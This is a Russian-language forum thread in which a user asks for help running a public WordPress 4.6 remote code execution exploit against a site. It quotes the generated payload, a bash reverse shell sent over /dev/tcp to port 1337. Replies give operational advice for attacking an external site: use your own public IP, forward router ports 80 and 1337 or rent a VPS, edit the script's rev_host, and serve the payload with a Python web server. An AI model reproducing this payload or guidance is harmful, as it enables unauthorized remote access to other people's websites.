![]() |
Хочу проэксплуатировать WP 4.6 Remote Code Execution.
Сам сплойт: https://exploitbox.io/exploit/wordpress-rce-exploit.sh. Есть сайт нужной версии, в системе есть netcat. При запуске: ./wordpress-rce-exploit.sh site.com я вижу в консоли какой-то HTML и просто всё подвисает, нет сообщения о неудачное эксплуатации и т.д. А рядом создаётся файл rce.txt с содержимым: (sleep 3s && nohup bash -i >/dev/tcp/192.168.57.1/1337 0&1) & Что я делаю не так и как правильно проэксплуатировать Ага! Среди кучи HTML-я заметил это:
|
Если ты пробиваешь внешний сайт (не из твоей локалки), то нужно указывать свой внешний айпишник + пробросить порты на роутере (один для веб сервера, который поднимается питоном - 80 и один для шелла - 1337).
Либо юзать какой-то промежуточный VPS/VDS. |
Цитата:
|
Цитата:
У меня сейчас так: Порт сервисаIP-адресВнутренний портПротоколСостояниеИзме нить 1337192.168.0.41337TCP или UDPВключеноИзменить Я на правильном пути? |
Цитата:
Дальше в эксплоите свой внешний айпишник используй. Если не прокатит, то есть вероятность того, что на твоём провайдере такое не заработает. Тогда копать в сторону VPS/VDS. |
Цитата:
|
Цитата:
|
Цитата:
Код: Код:
Warning: Inverse name lookup failed for `0.0.5.57'Порт сервисаIP-адресВнутренний портПротоколСостояниеИзме нить 1337192.168.0.41337TCP или UDPВключеноИзменить81192.168.0.481 TCP или UDPВключеноИзменить |
Цитата:
Тебе в скрипте нужно поправить: Код:
rev_host="192.168.57.1"И тут Код:
python -mSimpleHTTPServer 80 2>/dev/null >&2 & |
Цитата:
|
| Время: 19:41 |